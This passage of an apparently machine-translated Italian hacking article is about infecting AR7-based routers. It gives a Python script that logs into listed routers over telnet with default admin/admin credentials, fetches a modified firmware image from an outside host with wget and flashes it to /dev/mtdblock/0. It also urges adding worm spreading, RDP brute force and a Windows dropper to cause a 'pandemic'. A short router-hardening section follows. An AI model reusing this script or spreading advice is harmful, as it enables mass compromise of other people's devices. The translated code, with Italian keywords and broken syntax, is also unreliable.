riscrivi / ripristina le immagini ... Questa è una prospettiva molto triste. anche le mani
scendono un po', se teniamo conto anche che la risorsa di riscrittura della memoria Flash
piccolo (per maggiori dettagli vedere la documentazione per il chip di memoria), e c'è una prospettiva
mollala. Ma c'è una via d'uscita! Qemu può emulare AR7! Riesci a immaginare cosa?
offre possibilità e infinite comodità? Ora niente ci ostacola
scrivi qualcosa di incredibilmente bello!
Così. Hai scritto un programma, l'hai verificato da solo o su 1-2 router di altre persone, ma dopo tutto
l'intera rete è ancora avanti, l'infezione manuale è noiosa, inizi già dal decimo router
maledico il mondo intero, e fluttua negli occhi delle corde di "cat" e "mtd". scriveremo
un programma per automatizzare queste azioni di routine. Ho scelto il linguaggio Python.
Il piano di lavoro è il seguente:
- compilare un elenco di router, ad esempio, utilizzando nmap;
- lo script dovrebbe prendere dall'elenco in ordine di indirizzo IP, passare attraverso
telnet con login/password standard; - poi le stesse azioni: carica l'immagine modificata,
sovrascrivere, riavviare.
#! / usr / bin / env python
# Codifica = UTF-8
importa telnetlib, ora
SERVER = "http://anyhost.com/fs.image"
per addr in open ("iplist.txt"):
telnet = telnetlib.Telnet (addr)
telnet.set_debuglevel (1)
telnet.read_until ("accesso:")
tempo.sonno (5)
telnet.write ("admin \ n")
telnet.read_until ("Password:")
telnet.write ("admin \ n")
telnet.read_until ("#")
telnet.write ("cd / var && wget" + SERVER)
telnet.read_until ("#")
telnet.write ("cat fs.image> / dev / mtdblock / 0")
telnet.read_until ("#")
telnet.write ("riavvio")
telnet.close ()
La logica della sceneggiatura è molto lontana dall'ideale, ora spiegherò perché. Per
per prima cosa, dovresti controllare la versione del firmware / kernel e il modello del router, perché potrebbe esserci
gravi differenze nel lavoro. Inoltre, invece di spazi vuoti del firmware, dovresti pompare fuori
immagine del file system dal router, scompattare, modificare e inviare
indietro. Ciò eliminerà i problemi di compatibilità tra diversi
modelli / versioni firmware, perché la stabilità del lavoro è la cosa più importante per te.
Inoltre, il virus può avere le funzioni di un worm e, se lo desideri, puoi sempre
avvitare uno scanner di rete, forza bruta per RDP e chip simili ad esso.
C'è un altro ottimo metodo di distribuzione. Niente ti impedisce di scrivere
programma per Windows, che avrai con te (o scarichi dal tuo
server) del file system e infettare con esso il router, se presente.
Ridistribuire questo programma con tutti i mezzi "standard": unità rimovibili,
exploit per programmi, infettando altri programmi... Combinando questi metodi,
puoi creare una grave pandemia. Immagina solo questa foto - dopo tutto
tali dispositivi sono onnipresenti.
Protezione del router
Dopo aver scovato tutto questo, ho pensato: come si può proteggere un router? E poi, vedi, e
Lo prenderò io stesso. Il primo passo è cambiare la password dell'utente in una più complessa e
lungo (limite - 8 caratteri), cambia banner e saluti di servizio
(con un editor esadecimale, o, che è preferibile, ricompilare i programmi), in modo che
nmap o altri scanner non sono stati in grado di rilevare le versioni del servizio.
Dovresti anche cambiare le porte su cui si bloccano i demoni. Questo è fatto da
modifiche progdefs.xml. Uccidi telnet (il modo più semplice per trovare una password, sì
e il protocollo non è protetto, perché ne abbiamo bisogno), accendi il firewall, consenti la connessione
ai servizi solo dal proprio indirizzo IP o MAC. Usa anche un firewall
per proteggere una rete o un computer, non è vano che sia presente. Impostazione competente
le regole ti aiuteranno sempre a difenderti.
Conclusione
Molti, non solo i router D-Link e altri dispositivi simili sono costruiti su
Chip AR7, la lista include Acorp, NetGear, Linksys, Actionec...
questo AR7 è popolare insieme a MontaVista. Quindi segue che usando lo stesso
toolchain, puoi eseguire i passaggi descritti nell'articolo senza problemi.
Pensaci: oltre alle azioni dannose, puoi anche fare qualcosa di utile/piacevole per te stesso
e altri (non discuto, il piacere dell'hacking non può essere sostituito, ma comunque).
Puoi creare il tuo firmware, ad esempio, router più potenti in grado di
scarica / distribuisci torrent ... Tutti i modelli hanno un'interfaccia USB 1.1, ma nel più giovane
modelli, non è saldato. Aggiungi un modulo USB e un driver di file system al kernel,
dotare il router di memoria Flash e, di conseguenza, si ottiene una sorta di memoria di rete per
pochi soldi. Ci sono molte opzioni e le idee dovrebbero sorgere a migliaia, no
limita te stesso, crea e crea!
